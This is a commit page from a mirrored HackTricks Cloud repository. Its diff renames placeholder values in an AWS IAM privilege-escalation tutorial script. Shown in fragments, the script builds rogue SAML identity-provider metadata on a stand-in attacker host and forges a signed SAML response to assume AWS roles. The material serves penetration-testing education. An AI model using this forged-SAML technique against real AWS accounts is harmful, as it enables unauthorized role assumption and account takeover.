gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-03-12 21:22:57 -07:00
Code Issues Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
Jaime Polop
2026-02-20 14:12:21 +01:00
committed by GitHub
parent 005ab23773
commit 633b608c29
1 changed files with 6 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md
View File

@@ -384,7 +384,7 @@ def _openssl_make_key_and_cert(tmpdir: str) -> tuple[str, str]:
"3650",
"-nodes",
"-subj",
"/CN=iam-lab-7-attacker",
"/CN=attacker-idp",
]
)
return key_path, cert_path
@@ -402,7 +402,7 @@ def _pem_cert_to_b64(cert_pem: str) -> str:
def make_metadata_xml(cert_b64: str) -> str:
return f"""<?xml version="1.0"?>
<EntityDescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://iam-lab-7.attacker.invalid/idp">
<EntityDescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://attacker-idp.invalid/idp">
<IDPSSODescriptor protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
<KeyDescriptor use="signing">
<KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#">
@@ -411,7 +411,7 @@ def make_metadata_xml(cert_b64: str) -> str:
</X509Data>
</KeyInfo>
</KeyDescriptor>
<SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="https://iam-lab-7.attacker.invalid/sso"/>
<SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="https://attacker-idp.invalid/sso"/>
</IDPSSODescriptor>
</EntityDescriptor>
"""
@@ -437,7 +437,7 @@ def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, c
response.set("Destination", "https://signin.aws.amazon.com/saml")
issuer = etree.SubElement(response, etree.QName(ns["saml2"], "Issuer"))
issuer.text = "https://iam-lab-7.attacker.invalid/idp"
issuer.text = "https://attacker-idp.attacker.invalid/idp"
status = etree.SubElement(response, etree.QName(ns["saml2p"], "Status"))
status_code = etree.SubElement(status, etree.QName(ns["saml2p"], "StatusCode"))
@@ -449,7 +449,7 @@ def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, c
assertion.set("IssueInstant", issue_instant.isoformat())
a_issuer = etree.SubElement(assertion, etree.QName(ns["saml2"], "Issuer"))
a_issuer.text = "https://iam-lab-7.attacker.invalid/idp"
a_issuer.text = "https://attacker-idp.attacker.invalid/idp"
subject = etree.SubElement(assertion, etree.QName(ns["saml2"], "Subject"))
name_id = etree.SubElement(subject, etree.QName(ns["saml2"], "NameID"))
@@ -488,7 +488,7 @@ def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, c
attr_session = etree.SubElement(attribute_statement, etree.QName(ns["saml2"], "Attribute"))
attr_session.set("Name", "https://aws.amazon.com/SAML/Attributes/RoleSessionName")
attr_session_value = etree.SubElement(attr_session, etree.QName(ns["saml2"], "AttributeValue"))
attr_session_value.text = "iam-lab-7-session"
attr_session_value.text = "attacker-idp"
with open(key_pem, "rb") as f:
key_bytes = f.read()